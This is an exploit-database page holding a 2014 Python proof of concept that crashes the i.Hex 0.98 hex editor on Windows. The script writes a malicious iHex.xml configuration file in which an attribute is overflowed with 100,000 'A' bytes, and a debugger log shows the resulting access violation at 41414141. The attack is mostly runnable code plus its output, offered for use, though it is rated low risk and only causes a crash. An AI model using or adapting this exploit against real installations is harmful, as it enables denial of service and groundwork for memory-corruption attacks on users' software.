i.Hex 0.98 Local Crash Proof Of Concept

2014.11.07
Credit: metacom
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python #Exploit Title:i.Hex Local Crash Poc #Homepage:http://www.memecode.com/ihex.php #Software Link:www.memecode.com/data/ihex-win32-v0.98.exe #Version:i.Hex-v0.98 (Win32 Release) #Description:i.Hex is a small and free graphical Hex Editor for Windows.. #Tested on:Win7 32bit #Exploit Author:metacom --> twitter.com/m3tac0m #Date:05.11.2014 ''' Immunity Debugger Log data EAX 0135B8F8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ECX 41414141 EDX 41414141 EBX 01363FA0 ESP 0012F6D8 EBP 0012F700 ESI 0135B8F0 EDI 005F0000 EIP 77B85FBD ntdll.77B85FBD Press Shift+9 Log data, item 0 Address=77B85B44 Message=[15:56:05] Access violation when reading [41414141] ''' print "\n[*]Vulnerable Created iHex.xml!" print "[*]Copy iHex.xml to C:\Program Files\Memecode\i.Hex" print "[*]Start i.Hex" print "[*]------------------------------------------------" poc="\x41" * 100000 header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22" header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x49\x73\x48\x65\x78\x3d\x22\x31\x22\x0a\x09" header += "\x20\x4c\x69\x74\x74\x6c\x65\x45\x6e\x64\x69\x61\x6e\x3d\x22\x0a" + poc footer = "\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x31\x30\x30\x2c\x31\x30\x30\x2c\x35\x30\x30\x2c\x34\x30\x30\x22\x3e\x0a\x09\x3c\x4d" footer += "\x72\x75\x20\x49\x74\x65\x6d\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f" footer += "\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a" payload= header + footer # Write out our malicious file writeFile = open ("iHex.xml", "wb") writeFile.write( payload ) writeFile.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top